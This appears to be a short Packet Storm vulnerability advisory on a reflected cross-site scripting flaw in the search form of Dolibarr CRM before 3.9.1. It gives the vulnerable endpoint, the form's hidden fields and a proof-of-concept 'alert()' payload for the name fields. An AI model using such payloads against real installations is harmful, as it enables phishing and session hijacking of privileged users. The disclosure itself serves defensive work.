Dolibarr CRM Cross Site Scripting

Type packetstorm
Reporter David Silveiro
Modified 2016-06-22T00:00:00


                                            `# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability  
# Exploit Author: David Silveiro   
# Exploit Author Github:  
# Exploit Author Twitter:   
# Vendor Homepage:  
# Software Link:  
# Date: Zero Day  
Dolibarr ERP is a modern CRM to manage your company.It's opensource software,   
designed for small and medium companies, foundations and freelancers.  
The issue lyes with insufficient sanitization when a user makes use of the search  
function provided, and thus able to inject malicious JS to be used inhand with  
a phishing attack direct towards higher previliged user.  
<form name="formfilter" action="/societe/list.php" method="post">  
<input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input>  
<input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input>  
<input type="hidden" value="s.nom" name="sortfield"></input>  
<input type="hidden" value="ASC" name="sortorder"></input>  
Search criteria '  
alert() <-------  
' into fields Third party name, Alias name, Custom…  
<table class="liste "></table>